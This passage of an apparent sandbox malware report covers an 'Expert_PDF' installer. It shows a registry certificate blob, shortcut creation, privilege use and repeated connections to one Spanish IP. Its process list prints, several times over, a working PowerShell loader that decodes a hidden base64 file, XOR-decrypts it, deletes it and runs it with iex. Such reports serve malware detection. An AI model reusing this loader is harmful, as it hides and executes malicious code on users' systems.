0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe
"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"
C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp" /SL5="$C004A,111680340,999424,C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"
C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\ProgramData\Expert PDF 14\Installation\Statistics.dll"
C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe
"C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe" /RegServer
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{D512BD03-0077-4504-AE19-566B43F44E19}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.38.195.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.176.139.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.146.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api-updateservice.expert-pdf.com | udp |
| CA | 64.15.159.225:443 | api-updateservice.expert-pdf.com | tcp |
| US | 8.8.8.8:53 | 225.159.15.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.212.199.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wsgeoip.expert-pdf.com | udp |
| CA | 64.15.159.225:443 | wsgeoip.expert-pdf.com | tcp |
| US | 8.8.8.8:53 | 188.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| US | 8.8.8.8:53 | 151.122.125.40.in-addr.arpa | udp |
| US | 104.208.16.90:443 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| NL | 173.223.113.164:443 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 204.79.197.203:80 | tcp | |
| US | 8.8.8.8:53 | 2.77.109.52.in-addr.arpa | udp |
| NL | 84.53.175.11:80 | tcp | |
| US | 8.8.8.8:53 | 210.81.184.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.238.32.23.in-addr.arpa | udp |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| GB | 95.101.143.120:443 | assets.msn.com | tcp |
| ES | 5.189.222.80:80 | tcp | |
| US | 8.8.8.8:53 | 120.143.101.95.in-addr.arpa | udp |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| US | 8.8.8.8:53 | download14.expert-pdf.com | udp |
| CA | 64.15.159.225:80 | download14.expert-pdf.com | tcp |
| CA | 64.15.159.225:443 | download14.expert-pdf.com | tcp |
| US | 8.8.8.8:53 | redamex.expert-pdf.com | udp |
| CA | 64.15.159.204:443 | redamex.expert-pdf.com | tcp |
| CA | 64.15.159.225:80 | download14.expert-pdf.com | tcp |
| CA | 64.15.159.225:443 | download14.expert-pdf.com | tcp |
| ES | 5.189.222.80:80 | tcp | |
| US | 8.8.8.8:53 | 204.159.15.64.in-addr.arpa | udp |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
| ES | 5.189.222.80:80 | tcp | |
